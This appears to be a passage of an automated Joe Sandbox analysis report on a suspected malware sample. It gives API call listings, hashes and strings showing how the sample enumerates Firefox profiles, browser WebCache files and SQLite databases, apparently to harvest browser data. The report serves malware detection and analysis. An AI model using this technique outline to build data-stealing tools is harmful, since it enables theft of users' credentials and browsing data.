                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                              • API String ID: 4039892925-3369679110
                                                                                                                                                              • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                              • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                              • API String ID: 3510742995-2641926074
                                                                                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                              • String ID: $0.@
                                                                                                                                                              • API String ID: 2758756878-1896041820
                                                                                                                                                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2941347001-0
                                                                                                                                                              • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                              • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                              • API String ID: 1534475566-1174173950
                                                                                                                                                              • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                              • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                              Strings
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                              • API String ID: 71295984-2036018995
                                                                                                                                                              • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                              • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                              APIs
                                                                                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                              • String ID: "%s"
                                                                                                                                                              • API String ID: 1343145685-3297466227
                                                                                                                                                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                              • API String ID: 1714573020-3385500049
                                                                                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                              • memset.MSVCRT ref: 00408828
                                                                                                                                                              • memset.MSVCRT ref: 00408840
                                                                                                                                                              • memset.MSVCRT ref: 00408858
                                                                                                                                                              • memset.MSVCRT ref: 00408870
                                                                                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2911713577-0
                                                                                                                                                              • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                              • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                              APIs
                                                                                                                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmp
                                                                                                                                                              • String ID: @ $SQLite format 3
                                                                                                                                                              • API String ID: 1475443563-3708268960
                                                                                                                                                              • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                              • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmpqsort
                                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                                              • API String ID: 1579243037-1578091866
                                                                                                                                                              • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                              • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040E60F
                                                                                                                                                              • memset.MSVCRT ref: 0040E629
                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                              Strings
                                                                                                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                              • API String ID: 2887208581-2114579845
                                                                                                                                                              • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                              • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                              APIs
                                                                                                                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                              APIs
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(02170048), ref: 0044DF01
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(02180050), ref: 0044DF11
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00B56DB0), ref: 0044DF21
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(02180458), ref: 0044DF31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                              Memory Dump Source
